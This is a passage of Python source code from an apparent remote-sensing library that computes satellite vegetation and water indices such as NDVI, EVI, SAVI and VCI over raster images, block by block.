self.image_array = imcopy[:2]
self.vi_index = 'evi2'
evi2 = self.run_index(scale_factor, **kwargs)
self.image_array = imcopy[1:]
self.vi_index = 'ndsi'
ndsi = self.run_index(scale_factor, **kwargs)
else:
self.image_array = imcopy[:2]
self.vi_index = 'evi2'
evi2 = self.run_index(scale_factor)
self.image_array = imcopy[1:]
self.vi_index = 'ndsi'
ndsi = self.run_index(scale_factor)
ndsi = rescale_intensity(ndsi, in_range=(-1, 1), out_range=(0, 1))
self.image_array = np.stack((evi2, ndsi))
self.vi_index = 'twvi'
if kwargs:
return self.run_index(scale_factor, **kwargs)
else:
return self.run_index(scale_factor)
else:
vi_functions = {'ARVI': self.ARVI,
'BRIGHT': self.BRIGHT,
'CBI': self.CBI,
'CIre': self.CIre,
'EVI': self.EVI,
'EVI2': self.EVI2,
'IPVI': self.IPVI,
'GNDVI': self.GNDVI,
'MNDWI': self.MNDWI,
'MSAVI': self.MSAVI,
'NDSI': self.NDSI,
'NDBAI': self.NDBAI,
'NBRI': self.NBR,
'NDVI': self.NDVI,
'RENDVI': self.RENDVI,
'ONDVI': self.ONDVI,
'NDWI': self.NDWI,
'PNDVI': self.PNDVI,
'RBVI': self.RBVI,
'GBVI': self.GBVI,
'SATVI': self.SATVI,
'SAVI': self.SAVI,
'OSAVI': self.OSAVI,
'SVI': self.SVI,
'TNDVI': self.TNDVI,
'TVI': self.TVI,
'TWVI': self.TWVI,
'YNDVI': self.YNDVI,
'VCI': self.VCI,
'WI': self.WI}
if self.vi_index.upper() not in vi_functions:
raise NameError('{} is not a vegetation index option.'.format(self.vi_index))
vi_function = vi_functions[self.vi_index.upper()]
if kwargs:
return vi_function(kwargs)
else:
return vi_function()
def run_index(self, scale_factor, y=1., g=2.5, L=1., min_ndvi=-1, max_ndvi=1, **kwargs):
# EVI defaults
if self.vi_index.upper() == 'EVI' and not kwargs:
c1 = 6.0
c2 = 7.5
elif self.vi_index.upper() == 'EVI2' and not kwargs:
c1 = 2.4
no_data = self.no_data
in_no_data = self.in_no_data
pi = np.pi
# Setup a mask
if isinstance(self.mask_array, np.ndarray):
mask_array = self.mask_array
mask_equation = 'where(mask_array == 1, no_data, index_array)'
if self.n_bands == 2:
if self.image_array.shape[0] != 2:
logger.error(' The input array should have {:d} dimensions.'.format(self.n_bands))
raise ValueError
array01 = self.image_array[0]
array02 = self.image_array[1]
if not isinstance(self.mask_array, np.ndarray):
mask_equation = 'where((array01 == in_no_data) | (array02 == in_no_data), no_data, index_array)'
elif self.n_bands == 3:
if self.image_array.shape[0] != 3:
logger.error(' The input array should have {:d} dimensions.'.format(self.n_bands))
raise ValueError
array01 = self.image_array[0]
array02 = self.image_array[1]
array03 = self.image_array[2]
if not isinstance(self.mask_array, np.ndarray):
mask_equation = 'where((array01 == in_no_data) | (array02 == in_no_data) | (array03 == in_no_data), no_data, index_array)'
else:
logger.error(' The input array needs 2 or 3 bands.')
raise ValueError
index_array = ne.evaluate(self.equations[self.vi_index.upper()])
if self.vi_index.upper() == 'WI':
index_array = np.where(index_array > 0.5, 0, 1.0 - (index_array / 0.5))
d_range = self.data_ranges[self.vi_index.upper()]
if d_range:
if d_range[0] == -9999:
scale_data = False
else:
scale_data = True
# Clip lower and upper bounds.
index_array = ne.evaluate('where(index_array < {:f}, {:f}, index_array)'.format(d_range[0], d_range[0]))
index_array = ne.evaluate('where(index_array > {:f}, {:f}, index_array)'.format(d_range[1], d_range[1]))
# if self.out_type != 1:
# index_array += abs(d_range[0])
else:
scale_data = False
if scale_data:
if self.data_ranges[self.vi_index.upper()]:
if self.out_type == 2:
index_array = np.uint8(self.rescale_range(index_array, in_range=d_range))
elif self.out_type == 3:
index_array = np.uint16(self.rescale_range(index_array, in_range=d_range))
else:
if self.out_type == 2:
index_array = np.uint8(self.rescale_range(index_array, in_range=(0, 10000)))
elif self.out_type == 3:
index_array = np.uint16(index_array)
index_array[np.isinf(index_array) | np.isnan(index_array)] = self.no_data
index_array = ne.evaluate(mask_equation)
return index_array
def ARVI(self, y=1):
"""
Atmospherically Resistant Vegetation Index (ARVI)
Equation:
(nir - rb) / (nir + rb)
where, rb = red - y(blue - red)
where, y = gamma value (weighting factor depending on aersol type), (0.7 to 1.3)
"""
try:
blue = self.image_array[0]
red = self.image_array[1]
nir = self.image_array[2]
except:
raise ValueError('\nThe input array should have {:d} dimensions.\n'.format(self.n_bands))
rb1 = np.multiply(np.subtract(blue, red), y)
rb = np.subtract(red, rb1)
arvi = self.NDVI()
arvi[(blue == 0) | (red == 0) | (nir == 0)] = self.no_data
arvi[np.isinf(arvi) | np.isnan(arvi)] = self.no_data
if self.out_type > 1:
arvi = self.rescale_range(arvi)
return arvi
def BRIGHT(self):
try:
green = self.image_array[0]
red = self.image_array[1]
nir = self.image_array[2]
midir = self.image_array[3]
except:
raise ValueError('\nThe input array should have {:d} dimensions.\n'.format(self.n_bands))
bright = np.sqrt(green**2 + red**2 + nir**2 + midir**2)
bright[(green == 0) | (red == 0) | (nir == 0) | (midir == 0)] = self.no_data
bright[np.isinf(bright) | np.isnan(bright)] = self.no_data
if self.out_type > 1:
bright = self.rescale_range(bright)
return bright
def CBI(self):
"""
Coastal-Blue Index
Equation:
CBI = (blue - cblue) / (blue + cblue)
"""
try:
cblue = self.image_array[0]
blue = self.image_array[1]
except:
raise ValueError('\nThe input array should have {:d} dimensions.\n'.format(self.n_bands))
cbi = self.main_index(cblue, blue)
cbi[(cblue == 0) | (blue == 0)] = self.no_data
cbi[np.isinf(cbi) | np.isnan(cbi)] = self.no_data
if self.out_type > 1:
cbi = self.rescale_range(cbi, in_range=(-1., 1.))
return cbi
def CIre(self):
"""
Chlorophyll Index red-edge (CIre)
References:
Clevers, J.G.P.W. & <NAME>. (2013) Remote estimation of crop and grass chlorophyll and
nitrogen content using red-edge bands on Sentinel-2 and -3. International Journal of Applied
Earth Observation and Geoinformation, 23, 344-351.
"""
try:
rededge = self.image_array[0]
rededge3 = self.image_array[1]
except:
raise ValueError('\nThe input array should have {:d} dimensions.\n'.format(self.n_bands))
ci_re = np.subtract(np.divide(rededge3, rededge), 1.)
ci_re[(rededge == 0) | (rededge3 == 0)] = self.no_data
ci_re[np.isinf(ci_re) | np.isnan(ci_re)] = self.no_data
if self.out_type > 1:
ci_re = self.rescale_range(ci_re, in_range=(0., 1.))
return ci_re
def EVI(self, c1=6., c2=7.5, g=2.5, L=1.):
"""
Enhanced Vegetation Index (EVI)
Equation:
g * [ nir - Red
------------------------------
nir + C1 * Red - C2 * Blue + L
]
C1 = 6
C2 = 7.5
L = 1
g = 2.5
References:
Huete et al. (2002) Overview of the radiometric and biophysical performance of the
MODIS vegetation indices. Remote Sensing of Environment, 83, 195-213.
"""
try:
blue = self.image_array[0]
red = self.image_array[1]
nir = self.image_array[2]
except:
raise ValueError('\nThe input array should have {:d} dimensions.\n'.format(self.n_bands))
top = np.subtract(nir, red)
red_c1 = np.multiply(c1, red)
blue_c2 = np.multiply(c2, blue)
bottom = np.add(np.add(np.subtract(red_c1, blue_c2), nir), L)
evi = np.divide(top, bottom)
evi = np.multiply(evi, g)
evi[(blue == 0) | (red == 0) | (nir == 0)] = self.no_data
evi[np.isinf(evi) | np.isnan(evi)] = self.no_data
if self.out_type > 1:
evi = self.rescale_range(evi, in_range=(0., 1.))
return evi
def EVI2(self, c1=2.4, g=2.5, L=1.):
"""
Enhanced Vegetation Index (EVI2)
Reference:
<NAME>, <NAME>, <NAME>, and <NAME>. 2008. "Development of a
two-band enhanced vegetation index without a blue band." Remote Sensing of Environment 112: 3833-3845.
Equation:
g * [ nir - Red
---------------------
nir + (C1 * Red) + 1
]
c1 = 2.4
g = 2.5
"""
try:
red = self.image_array[0]
nir = self.image_array[1]
except:
raise ValueError('\nThe input array should have {:d} dimensions.\n'.format(self.n_bands))
top = np.subtract(nir, red)
bottom = np.add(np.add(np.multiply(red, c1), nir), L)
evi2 = np.divide(top, bottom)
evi2 = np.multiply(evi2, g)
evi2[(red == 0) | (nir == 0)] = self.no_data
evi2[np.isinf(evi2) | np.isnan(evi2)] = self.no_data
if self.out_type > 1:
evi2 = self.rescale_range(evi2, in_range=(0., 1.))
return evi2
def IPVI(self):
"""
Equation:
IPVI = nir / (nir + red)
"""
try:
red = self.image_array[0]
nir = self.image_array[1]
except:
raise ValueError('\nThe input array should have {:d} dimensions.\n'.format(self.n_bands))
bottom = np.add(nir, red)
ipvi = np.divide(nir, bottom)
ipvi[(red == 0) | (nir == 0)] = self.no_data
ipvi[np.isinf(ipvi) | np.isnan(ipvi)] = self.no_data
if self.out_type > 1:
ipvi = self.rescale_range(ipvi)
return ipvi
def MSAVI(self):
"""
Modified Soil Adjusted Vegetation Index (MSAVI2)
Equation:
((2 * nir + 1) - sqrt(((2 * nir + 1)^2) - (8 * (nir - Red)))) / 2
"""
try:
red = self.image_array[0]
nir = self.image_array[1]
except:
raise ValueError('\nThe input array should have {:d} dimensions.\n'.format(self.n_bands))
topR1 = np.add(np.multiply(nir, 2.), 1.)
topR2 = np.power(topR1, 2.)
topR4 = np.multiply(np.subtract(nir, red), 8.)
topR5 = np.subtract(topR2, topR4)
topR6 = np.sqrt(topR5)
msavi = np.subtract(topR1, topR6)
msavi = np.divide(msavi, 2.)
msavi[(red == 0) | (nir == 0)] = self.no_data
msavi[np.isinf(msavi) | np.isnan(msavi)] = self.no_data
if self.out_type > 1:
msavi = self.rescale_range(msavi)
return msavi
def GNDVI(self):
"""
Green Normalised Difference Vegetation Index (GNDVI)
Equation:
GNDVI = (NIR - green) / (NIR + green)
"""
try:
green = self.image_array[0]
nir = self.image_array[1]
except:
raise ValueError('\nThe input array should have {:d} dimensions.\n'.format(self.n_bands))
gndvi = self.main_index(green, nir)
gndvi[(gndvi < -1.)] = -1.
gndvi[(gndvi > 1.)] = 1.
gndvi[(green == 0) | (nir == 0)] = self.no_data
gndvi[np.isinf(gndvi) | np.isnan(gndvi)] = self.no_data
if self.out_type > 1:
gndvi = self.rescale_range(gndvi, in_range=(-1., 1.))
return gndvi
def MNDWI(self):
"""
Modified Normalised Difference Water Index (MNDWI)
Equation:
MNDWI = (green - MidIR) / (green + MidIR)
Reference:
<NAME> (2006) Modification of normalised difference water index (NDWI) to enhance
open water features in remotely sensed imagery. IJRS 27:14.
"""
try:
midir = self.image_array[0]
green = self.image_array[1]
except:
raise ValueError('\nThe input array should have {:d} dimensions.\n'.format(self.n_bands))
mndwi = self.main_index(midir, green)
mndwi[(mndwi < -1.)] = -1.
mndwi[(mndwi > 1.)] = 1.
mndwi[(green == 0) | (midir == 0)] = self.no_data
mndwi[np.isinf(mndwi) | np.isnan(mndwi)] = self.no_data
if self.out_type > 1:
mndwi = self.rescale_range(mndwi, in_range=(-1., 1.))
return mndwi
def NDSI(self):
"""
Normalised Difference Soil Index (NDSI) (Rogers) or
Normalised Difference Water Index (NDWI) (Gao)
Equation:
NDSI = (MidIR - NIR) / (MidIR + NIR)
References:
<NAME>. & <NAME>. (2004) 'Reducing signature
variability in unmixing coastal marsh Thematic
Mapper scenes using spectral indices' International
Journal of Remote Sensing, 25(12), 2317-2335.
<NAME> (1996) 'NDWI A Normalized Difference Water
Index for Remote Sensing of Vegetation Liquid Water
From Space' Remote Sensing of Environment.
"""
try:
nir = self.image_array[0]
midir = self.image_array[1]
except:
raise ValueError('\nThe input array should have {:d} dimensions.\n'.format(self.n_bands))
ndsi = self.main_index(nir, midir)
ndsi[(ndsi < -1.)] = -1.
ndsi[(ndsi > 1.)] = 1.
ndsi[(nir == 0) | (midir == 0)] = self.no_data
ndsi[np.isinf(ndsi) | np.isnan(ndsi)] = self.no_data
if self.out_type > 1:
ndsi = self.rescale_range(ndsi, in_range=(-1., 1.))
return ndsi
def NDBAI(self):
"""
Normalised Difference Bareness Index (NDBaI)
Equation:
NDBaI = (FarIR - MidIR) / (FarIR + MidIR)
Reference:
<NAME>, Chen, Xiaoling (2005) 'Use of Normalized
Difference Bareness Index in Quickly Mapping Bare
Areas from TM/ETM+' IEEE.
"""
try:
midir = self.image_array[0]
farir = self.image_array[1]
except:
raise ValueError('\nThe input array should have {:d} dimensions.\n'.format(self.n_bands))
ndbai = self.main_index(midir, farir)
ndbai[(ndbai < -1.)] = -1.
ndbai[(ndbai > 1.)] = 1.
ndbai[(midir == 0) | (farir == 0)] = self.no_data
ndbai[np.isinf(ndbai) | np.isnan(ndbai)] = self.no_data
if self.out_type > 1:
ndbai = self.rescale_range(ndbai, in_range=(-1., 1.))
return ndbai
def NBR(self):
"""
Normalised Burn Ratio (NBR)
Equation:
NBR = (NIR - FarIR) / (NIR + FarIR)
"""
try:
farir = self.image_array[0]
nir = self.image_array[1]
except:
raise ValueError('\nThe input array should have {:d} dimensions.\n'.format(self.n_bands))
nbr = self.main_index(farir, nir)
nbr[(nbr < -1.)] = -1.
nbr[(nbr > 1.)] = 1.
nbr[(nbr == 0) | (nir == 0)] = self.no_data
nbr[np.isinf(nbr) | np.isnan(nbr)] = self.no_data
if self.out_type > 1:
nbr = self.rescale_range(nbr, in_range=(-1.0, 1.0))
return nbr
def NDVI(self):
"""
Normalised Difference Vegetation Index (NDVI)
Equation:
NDVI = (NIR - red) / (NIR + red)
"""
try:
red = self.image_array[0]
nir = self.image_array[1]
except:
raise ValueError('\nThe input array should have {:d} dimensions.\n'.format(self.n_bands))
ndvi = self.main_index(red, nir)
ndvi[(ndvi < -1.)] = -1.
ndvi[(ndvi > 1.)] = 1.
ndvi[(red == 0) | (nir == 0)] = self.no_data
ndvi[np.isinf(ndvi) | np.isnan(ndvi)] = self.no_data
if self.out_type > 1:
ndvi = self.rescale_range(ndvi, in_range=(-1., 1.))
return ndvi
def RENDVI(self):
"""
Rededge Normalised Difference Vegetation Index (RENDVI)
Equation:
RENDVI = (NIR - rededge) / (NIR + rededge)
"""
try:
rededge = self.image_array[0]
nir = self.image_array[1]
except:
raise ValueError('\nThe input array should have {:d} dimensions.\n'.format(self.n_bands))
rendvi = self.main_index(rededge, nir)
rendvi[(rendvi < -1.)] = -1.
rendvi[(rendvi > 1.)] = 1.
rendvi[(rededge == 0) | (nir == 0)] = self.no_data
rendvi[np.isinf(rendvi) | np.isnan(rendvi)] = self.no_data
if self.out_type > 1:
rendvi = self.rescale_range(rendvi, in_range=(-1., 1.))
return rendvi
def NDWI(self):
"""
Normalised Difference Water Index (NDWI)
Equation:
NDWI = (green - NIR) / (green + NIR)
Reference:
<NAME>. (1996) 'The use of the Normalized Difference
Water Index (NDWI) in the delineation of open water
features, International Journal of Remote Sensing, 17(7),
1425-1432.
"""
try:
nir = self.image_array[0]
green = self.image_array[1]
except:
raise ValueError('\nThe input array should have {:d} dimensions.\n'.format(self.n_bands))
ndwi = self.main_index(nir, green)
ndwi[(ndwi < -1.)] = -1.
ndwi[(ndwi > 1.)] = 1.
ndwi[(green == 0) | (nir == 0)] = self.no_data
ndwi[np.isinf(ndwi) | np.isnan(ndwi)] = self.no_data
if self.out_type > 1:
ndwi = self.rescale_range(ndwi, in_range=(-1., 1.))
return ndwi
def PNDVI(self):
"""
Pseudo Normalised Difference Vegetation Index (PNDVI)
Equation:
PNDVI = (red - green) / (red + green)
"""
try:
green = self.image_array[0]
red = self.image_array[1]
except:
raise ValueError('\nThe input array should have {:d} dimensions.\n'.format(self.n_bands))
pndvi = self.main_index(green, red)
pndvi[(pndvi < -1.)] = -1.
pndvi[(pndvi > 1.)] = 1.
pndvi[(green == 0) | (red == 0)] = self.no_data
pndvi[np.isinf(pndvi) | np.isnan(pndvi)] = self.no_data
if self.out_type > 1:
pndvi = self.rescale_range(pndvi, in_range=(-1., 1.))
return pndvi
def RBVI(self):
"""
Red Blue Vegetation Index (RBVI)
Equation:
RBVI = (red - blue) / (red + blue)
"""
try:
blue = self.image_array[0]
red = self.image_array[1]
except:
raise ValueError('\nThe input array should have {:d} dimensions.\n'.format(self.n_bands))
rbvi = self.main_index(blue, red)
rbvi[(rbvi < -1.)] = -1.
rbvi[(rbvi > 1.)] = 1.
rbvi[(blue == 0) | (red == 0)] = self.no_data
rbvi[np.isinf(rbvi) | np.isnan(rbvi)] = self.no_data
if self.out_type > 1:
rbvi = self.rescale_range(rbvi, in_range=(-1., 1.))
return rbvi
def GBVI(self):
"""
Green Blue Vegetation Index (GBVI)
Equation:
GBVI = (green - blue) / (green + blue)
"""
try:
blue = self.image_array[0]
green = self.image_array[1]
except:
raise ValueError('\nThe input array should have {:d} dimensions.\n'.format(self.n_bands))
gbvi = self.main_index(blue, green)
gbvi[(gbvi < -1.)] = -1.
gbvi[(gbvi > 1.)] = 1.
gbvi[(blue == 0) | (green == 0)] = self.no_data
gbvi[np.isinf(gbvi) | np.isnan(gbvi)] = self.no_data
if self.out_type > 1:
gbvi = self.rescale_range(gbvi, in_range=(-1., 1.))
return gbvi
def ONDVI(self):
"""
Theta Normalised Difference Vegetation Index (0NDVI)
Equation:
(4 / pi) * arctan(NDVI)
"""
original_type = copy(self.out_type)
self.out_type = 1
ndvi = self.NDVI()
self.out_type = original_type
red = self.image_array[0]
nir = self.image_array[1]
ondvi = np.multiply(np.arctan(ndvi), 4. / np.pi)
ondvi[(red == 0) | (nir == 0)] = self.no_data
ondvi[np.isinf(ondvi) | np.isnan(ondvi)] = self.no_data
if self.out_type > 1:
ondvi = self.rescale_range(ondvi)
return ondvi
def SATVI(self, L=.5):
"""
Soil Adjusted Total Vegetation Index (SATVI)
Equation:
[((Mid-IR - Red) / (Mid-IR + Red + 0.1)) * 1.1)] - (Far-IR / 2)
"""
try:
red = self.image_array[0]
midir = self.image_array[1]
farir = self.image_array[2]
except:
raise ValueError('\nThe input array should have {:d} dimensions.\n'.format(self.n_bands))
top_r0 = np.subtract(midir, red)
top_r1 = np.add(np.add(midir, red), L)
top_r2 = np.divide(top_r0, top_r1)
satvi = np.multiply(top_r2, 1.+L)
satvi = np.subtract(satvi, np.divide(farir, 2.))
satvi[(red == 0) | (midir == 0) | (farir == 0)] = self.no_data
satvi[np.isinf(satvi) | np.isnan(satvi)] = self.no_data
if self.out_type > 1:
satvi = self.rescale_range(satvi)
return satvi
def SAVI(self, L=.5):
"""
Soil Adjusted Vegetation Index (SAVI)
Equation:
((NIR - red) / (NIR + red + L)) * (1 + L)
"""
try:
red = self.image_array[0]
nir = self.image_array[1]
except:
raise ValueError('\nThe input array should have {:d} dimensions.\n'.format(self.n_bands))
top_r = np.subtract(nir, red)
top_rx = np.multiply(top_r, 1.+L)
bottom = np.add(np.add(red, nir), L)
savi = np.divide(top_rx, bottom)
savi[(red == 0) | (nir == 0)] = self.no_data
savi[np.isinf(savi) | np.isnan(savi)] = self.no_data
if self.out_type > 1:
savi = self.rescale_range(savi)
return savi
def OSAVI(self, L=.5):
"""
Theta Soil Adjusted Vegetation Index (0SAVI)
Equation:
((NIR - red) / (NIR + red + L)) * (1 + L)
arctan(-----------------------------------------) * 2
1.5
"""
try:
red = self.image_array[0]
nir = self.image_array[1]
except:
raise ValueError('\nThe input array should have {:d} dimensions.\n'.format(self.n_bands))
original_type = copy(self.out_type)
self.out_type = 1
osavi = self.SAVI()
self.out_type = original_type
osavi = np.multiply(np.arctan(np.divide(osavi, 1.5)), 2.)
osavi[(red == 0) | (nir == 0)] = self.no_data
osavi[np.isinf(osavi) | np.isnan(osavi)] = self.no_data
if self.out_type > 1:
osavi = self.rescale_range(osavi)
return osavi
def SVI(self):
"""
Simple Vegetation Index (SVI)
Equation:
NIR / red
"""
try:
red = self.image_array[0]
nir = self.image_array[1]
except:
raise ValueError('\nThe input array should have {:d} dimensions.\n'.format(self.n_bands))
svi = np.divide(nir, red)
svi[(red == 0) | (nir == 0)] = self.no_data
svi[np.isinf(svi) | np.isnan(svi)] = self.no_data
if self.out_type > 1:
svi = self.rescale_range(svi)
return svi
def TNDVI(self):
"""
Transformed Normalised Difference Vegetation Index (TNDVI)
Equation:
Square Root(((NIR - red) / (NIR + red)) * 0.5)
"""
try:
red = self.image_array[0]
nir = self.image_array[1]
except:
raise ValueError('\nThe input array should have {:d} dimensions.\n'.format(self.n_bands))
original_type = copy(self.out_type)
self.out_type = 1
tndvi = self.NDVI()
self.out_type = original_type
tndvi = self.NDVI()
tndvi = np.sqrt(np.multiply(tndvi, .5))
tndvi[(red == 0) | (nir == 0)] = self.no_data
tndvi[np.isinf(tndvi) | np.isnan(tndvi)] = self.no_data
if self.out_type > 1:
tndvi = self.rescale_range(tndvi)
return tndvi
def TVI(self):
"""
Transformed Vegetation Index (TVI)
Equation:
Square Root(((NIR - green) / (NIR + green)) + 0.5)
"""
original_type = copy(self.out_type)
self.out_type = 1
tvi = self.GNDVI()
self.out_type = original_type
green = self.image_array[0]
nir = self.image_array[1]
tvi = np.sqrt(np.add(tvi, .5))
tvi[(green == 0) | (nir == 0)] = self.no_data
tvi[np.isinf(tvi) | np.isnan(tvi)] = self.no_data
if self.out_type > 1:
tvi = self.rescale_range(tvi)
return tvi
def YNDVI(self):
"""
Yellow Normalized Difference Vegetation Index (YNDVI)
Equation:
YNDVI = (nir - yellow) / (nir + yellow)
"""
try:
yellow = self.image_array[0]
nir = self.image_array[1]
except:
raise ValueError('\nThe input array should have {:d} dimensions.\n'.format(self.n_bands))
yndvi = self.main_index(yellow, nir)
yndvi[(yndvi < -1.)] = -1.
yndvi[(yndvi > 1.)] = 1.
yndvi[(yellow == 0) | (nir == 0)] = self.no_data
yndvi[np.isinf(yndvi) | np.isnan(yndvi)] = self.no_data
if self.out_type > 1:
yndvi = self.rescale_range(yndvi, in_range=(-1., 1.))
return yndvi
def VCI(self, min_ndvi=-1, max_ndvi=1):
"""
Vegetation Condition Index (VCI)
Reference:
Kogan (1997) & Kogan et al. (2011)
Equation:
(NDVI - NDVI_min) / (NDVI_max - NDVI_min)
"""
original_type = copy(self.out_type)
self.out_type = 1
ndvi = self.NDVI()
self.out_type = original_type
red = self.image_array[0]
nir = self.image_array[1]
vci = np.subtract(ndvi, min_ndvi)
vci_bot = np.subtract(max_ndvi, min_ndvi)
vci = np.divide(vci, vci_bot)
vci[(red == 0) | (nir == 0)] = self.no_data
vci[np.isinf(vci) | np.isnan(vci)] = self.no_data
if self.out_type > 1:
vci = self.rescale_range(vci)
return vci
def WI(self):
"""
Woody index
Equation:
WI = 1 - ((red + swir1) / 0.5)
"""
try:
red = self.image_array[0]
swir1 = self.image_array[1]
except:
raise ValueError('\nThe input array should have {:d} dimensions.\n'.format(self.n_bands))
wi = red + swir1
wi = np.where(wi > 0.5, 0, 1.0 - (wi / 0.5))
wi[(swir1 == 0) | (swir1 == 0)] = self.no_data
wi[np.isinf(wi) | np.isnan(wi)] = self.no_data
if self.out_type > 1:
wi = self.rescale_range(wi, in_range=(0, 1))
return wi
def main_index(self, array01, array02):
top = np.subtract(array02, array01)
bottom = np.add(array02, array01)
return np.divide(top, bottom)
class BandHandler(SensorInfo):
def __init__(self, sensor):
self.sensor = sensor
SensorInfo.__init__(self)
def get_band_order(self):
try:
self.band_order = self.band_orders[self.sensor]
except:
raise ValueError('\n{} is not supported. Choose from: {}'.format(self.sensor, ','.join(self.sensors)))
def stack_bands(self, band_list):
"""
Returns stacked bands in sorted (smallest band to largest band) order.
"""
band_positions = self.get_band_positions(band_list)
return self.meta_info.read(bands2open=band_positions,
i=self.i,
j=self.j,
sort_bands2open=False,
rows=self.n_rows,
cols=self.n_cols,
d_type='float32')
def get_band_positions(self, band_list):
return [self.band_order[img_band] for img_band in band_list]
class VegIndices(BandHandler):
"""
Args:
input_image (str)
input_indice (str)
sensor (str)
mask_band (Optional[int])
"""
def __init__(self, input_image, input_indice, sensor, mask_band=None):
self.input_indice = input_indice
self.mask_band = mask_band
# Get the sensor band order.
BandHandler.__init__(self, sensor)
self.get_band_order()
# Open the image.
self.meta_info = raster_tools.ropen(input_image)
self.rows, self.cols = self.meta_info.rows, self.meta_info.cols
def run(self, output_image, storage='float32',
no_data=0, in_no_data=0, chunk_size=1024, k=0,
be_quiet=False, overwrite=False, overviews=False,
scale_factor=1.):
"""
Args:
output_image (str)
storage (Optional[str])
no_data (Optional[int])
in_no_data (Optional[int])
chunk_size (Optional[int])
k (Optional[int])
be_quiet (Optional[bool])
overwrite (Optional[bool])
overviews (Optional[bool])
scale_factor (Optional[float])
"""
self.output_image = output_image
self.storage = storage
self.no_data = no_data
self.in_no_data = in_no_data
self.chunk_size = chunk_size
self.k = k
self.be_quiet = be_quiet
print_progress = True
if self.storage == 'float32':
self.out_type = 1
elif self.storage == 'byte':
if (self.no_data < 0) or (self.no_data > 255):
raise ValueError("""
The 'no data' value cannot be less than 0 or
greater than 255 with Byte storage.
""")
self.out_type = 2
elif self.storage == 'uint16':
if self.no_data < 0:
raise ValueError("""
The 'no data' value cannot be less than 0
with UInt16 storage.
""")
self.out_type = 3
else:
raise NameError('{} is not a supported storage option.'.format(self.storage))
d_name, f_name = os.path.split(self.output_image)
__, f_ext = os.path.splitext(f_name)
if not os.path.isdir(d_name):
os.makedirs(d_name)
o_info = self.meta_info.copy()
o_info.storage = self.storage
o_info.bands = 1
if self.chunk_size == -1:
block_size_rows = copy(self.rows)
block_size_cols = copy(self.cols)
print_progress = False
else:
# set the block size
block_size_rows, block_size_cols = raster_tools.block_dimensions(self.rows, self.cols,
row_block_size=self.chunk_size,
col_block_size=self.chunk_size)
if overwrite:
associated_files = fnmatch.filter(os.listdir(d_name), '*{}*'.format(f_name))
associated_files = fnmatch.filter(associated_files, '*{}*'.format(f_ext))
if associated_files:
for associated_file in associated_files:
associated_file_full = '{}/{}'.format(d_name, associated_file)
if os.path.isfile(associated_file_full):
os.remove(associated_file_full)
if os.path.isfile(self.output_image):
logger.info('\n{} already exists ...'.format(self.output_image))
else:
out_rst = raster_tools.create_raster(self.output_image, o_info, compress='none')
out_rst.get_band(1)
if not self.be_quiet:
logger.info('\n{} ...\n'.format(self.input_indice.upper()))
if print_progress:
ctr, pbar = _iteration_parameters(self.rows, self.cols, block_size_rows, block_size_cols)
max_ndvi, min_ndvi = 0., 0.
# Iterate over the image block by block.
for self.i in range(0, self.rows, block_size_rows):
self.n_rows = raster_tools.n_rows_cols(self.i, block_size_rows, self.rows)
for self.j in range(0, self.cols, block_size_cols):
self.n_cols = raster_tools.n_rows_cols(self.j, block_size_cols, self.cols)
# Stack the image array with the
# appropriate bands.
try:
if self.input_indice.upper() == 'VCI':
image_stack = self.stack_bands(self.wavelength_lists['NDVI'])
else:
image_stack = self.stack_bands(self.wavelength_lists[self.input_indice.upper()])
except:
raise NameError('{} cannot be computed for {}.'.format(self.input_indice.upper(), self.sensor))
if isinstance(self.mask_band, int):
mask_array = self.meta_info.read(bands2open=self.mask_band,
i=self.i,
j=self.j,
rows=self.n_rows,
cols=self.n_cols,
d_type='byte')
else:
mask_array = None
# Setup the vegetation index object.
vie = VegIndicesEquations(image_stack,
chunk_size=self.chunk_size,
no_data=self.no_data,
in_no_data=self.in_no_data,
mask_array=mask_array)
# Calculate the vegetation index.
veg_indice_array = vie.compute(self.input_indice,
out_type=self.out_type,
scale_factor=scale_factor)
if self.input_indice.upper() == 'VCI':
# get the maximum NDVI value for the image
max_ndvi = max(veg_indice_array.max(), max_ndvi)
# get the maximum NDVI value for the image
min_ndvi = min(veg_indice_array.min(), min_ndvi)
if self.input_indice != 'VCI':
out_rst.write_array(veg_indice_array, i=self.i, j=self.j)
if not self.be_quiet:
if print_progress:
pbar.update(ctr)
ctr += 1
if not self.be_quiet:
if print_progress:
pbar.finish()
if self.input_indice.upper() == 'VCI':
if not self.be_quiet:
logger.info('\nComputing VCI ...')
# iterative over entire image with row blocks
for self.i in range(0, self.rows, block_size_rows):
self.n_rows = raster_tools.n_rows_cols(self.i, block_size_rows, self.rows)
for self.j in range(0, self.cols, block_size_cols):
self.n_cols = raster_tools.n_rows_cols(self.j, block_size_cols, self.cols)
# Stack the image array with the
# appropriate bands.
try:
image_stack = self.stack_bands(self.wavelength_lists[self.input_indice.upper()])
except:
raise NameError('{} cannot be computed for {}.'.format(self.input_indice.upper(),
self.sensor))
# Setup the vegetation index object.
vie = VegIndicesEquations(image_stack, chunk_size=self.chunk_size)
# Calculate the VCI index.
veg_indice_array = vie.compute(self.input_indice, out_type=self.out_type,
min_ndvi=min_ndvi, max_ndvi=max_ndvi)
out_rst.write_array(veg_indice_array, i=self.i, j=self.j)
out_rst.close_all()
out_rst = None
if self.k > 0:
print('')
d_name, f_name = os.path.split(self.output_image)
f_base, f_ext = os.path.splitext(f_name)
outImgResamp = '{}/{}_resamp{}'.format(d_name, f_base, f_ext)
comResamp = 'gdalwarp -tr {:f} {:f} -r near {} {}'.format(self.k, self.k,
self.output_image, outImgResamp)
subprocess.call(comResamp, shell=True)
if overviews:
logger.info('\nComputing overviews ...\n')
with raster_tools.ropen(output_image) as v_info:
v_info.build_overviews()
self.meta_info.close()
o_info.close()
self.meta_info = None
o_info = None
def _compute_as_list(img, out_img, sensor, k, storage, no_data, chunk_size,
overwrite, overviews, veg_indice_list=[]):
if (len(veg_indice_list) == 1) and (veg_indice_list[0].lower() == 'all'):
si = SensorInfo()
si.list_indice_options(sensor)
veg_indice_list = si.sensor_indices
d_name, f_name = os.path.split(out_img)
f_base, f_ext = os.path.splitext(f_name)
name_list = []
for input_indice in veg_indice_list:
out_img_indice = '{}/{}_{}{}'.format(d_name, f_base, input_indice.lower(), f_ext)
name_list.append(out_img_indice)
vio = VegIndices(img, input_indice, sensor)
vio.run(out_img_indice, k=k, storage=storage, no_data=no_data, chunk_size=chunk_size, overwrite=overwrite)
out_stack = '{}/{}_STACK.vrt'.format(d_name, f_base)
# Stack all the indices.
composite(d_name, out_stack, stack=True, image_list=name_list, build_overviews=overviews, no_data=no_data)
# Save a list of vegetation indice names.
